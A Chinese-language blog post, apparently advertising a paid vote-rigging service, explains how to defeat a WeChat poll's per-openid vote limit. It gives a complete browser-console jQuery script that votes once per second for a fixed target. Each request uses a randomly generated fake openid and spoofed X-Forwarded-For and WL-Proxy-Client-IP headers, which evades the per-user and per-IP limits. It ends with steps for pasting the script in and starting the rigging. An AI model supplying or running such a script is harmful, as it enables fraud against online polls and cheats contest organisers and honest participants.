微信投票人工投票刷票

   添加微信号:  

   80165877 

   复制红色数字添加微信

最近几天,有个朋友找我去写一个脚本帮他 在微信上刷票、微信投票刷票,我大概看了一下,本次微信投票刷票其实就是根据微信的openid来限制,每个openid只能投三次票的限制。

1.直接电脑使用谷歌浏览器进去朋友微信投票刷票的投票页面,f12查看页面内容

其实在页面上手动随意修改上图中openid,即可肆意不限制投票。但这样操作微信投票刷票太麻烦了,可以看下js源码

上图可以看出,其实只要openid,和toopenid即可,openid是自己的微信id,toopenid是投票对象的微信id,那我们定时修改openid即可给某一个人刷投票

下面贴代码

//执行脚本
function init(){
initIp();
}
//定时操作,每秒执行一次
function demo(){
}setInterval( "init()", 1000);
//随机生成以ovgMdt开头的27位微信openid(字母大小写+数字)
function createNum(){
var str = "ovgMdt",
range = 21,
arr = [ '0', '1', '2', '3', '4', '5', '6', '7', '8', '9', 'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z', 'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z'];
// 随机产生
for(var i= 0; i<range; i++){
pos = Math.round(Math.random() * (arr.length- 1));
str += arr[pos];
}
return str;
}
//提交请求
function initIp(){
var ip=createIp();
var num=createNum();
var $toopenid= 'ovgMdtSysi89sfInf0pdfg5T';
var submitData = {
toopenid: $toopenid,
openid: num
};
$.ajax({
headers:{ 'x-forwarded-for':ip, 'WL-Proxy-Client-IP':ip},
type: "POST",
url: "xxxxxxxxxxxxxx",
data: submitData,
dataType: "json",
beforeSend: function () {},
success: function (data) {
if (data.code == 0) {
$( "#"+$toopenid).text(data.vote);
if(data.today_vote >= 2){
$( ".vote").addClass( "red");
}
$( "#"+$toopenid).parent().find( ".plus").css({ "top": "186px", "opacity": 0});
$( "#"+$toopenid).parent().find( ".plus").stop().animate({ "top": "176px", "opacity": 1}, 300, "swing").animate({ "opacity": 0}, 100);
} else {
alert(data.msg);
}
}
});
}
//生成随机的ip地址
function createIp() {
var a = Math.round(Math.random() * 250) + 1,
b = Math.round(Math.random() * 250) + 1,
c = Math.round(Math.random() * 240) + 1,
d = Math.round(Math.random() * 240) + 1;
return [a, b, c, d].join( '.');
}

这里生成了模拟的ip地址
把这段代码复制到浏览器F12之后的console里,直接回车即可开始微信投票刷票(刷新或关闭浏览器即可停止刷票)

刷票的时候可以看一下network里的header,如下图

观察每个请求的ip地址和openid都是每次都切换的。

点赞(0) 打赏
立即
投稿

微信公众账号

微信扫一扫加关注

发表
评论
返回
顶部